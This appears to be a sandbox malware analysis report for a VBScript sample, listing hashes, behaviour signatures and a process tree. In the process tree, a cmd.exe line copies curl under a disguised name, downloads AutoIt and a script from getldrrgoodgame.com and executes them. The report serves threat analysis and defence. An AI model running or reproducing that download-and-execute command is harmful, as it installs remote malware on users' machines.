Resubmissions

04-10-2023 14:22

231004-rpmycsed29 10

04-10-2023 13:53

231004-q6y7aaeb22 10

Analysis

  • max time kernel
    122s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    04-10-2023 13:53

General

  • Target

    Test_395-13959.vbs

  • Size

    6.9MB

  • MD5

    5a9c56d5b6a4ae5fc402d99fa45f5598

  • SHA1

    d1572724ca4ecc99edaf4104f51385265bb27682

  • SHA256

    961372719771b69d8cf4d62f2b3703d7322544d16dc08036a217102382200498

  • SHA512

    5c9ab4ba5c102217077e6b4981f99c1bbf7e0a1842bfe38edcaa5e5b59d3c7bc11a8954eb8917d05dc7addc4023fbc0758e7ed2ddcce861503ff940fcad93e57

  • SSDEEP

    49152:jzgZNELkkGo137QXFsHKCaEcFMICJ/r1lHszS6rY7fch38ZkcwMKvmLXhEbvYrTJ:t

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Test_395-13959.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2244
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir c:\omxg & cd /d c:\omxg & copy c:\windows\system32\curl.exe omxg.exe & omxg -H "User-Agent: curl" -o Autoit3.exe http://getldrrgoodgame.com:2351 & omxg -o xqkbij.au3 http://getldrrgoodgame.com:2351/msiomxgnyqu & Autoit3.exe xqkbij.au3
      2⤵
        PID:2284

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads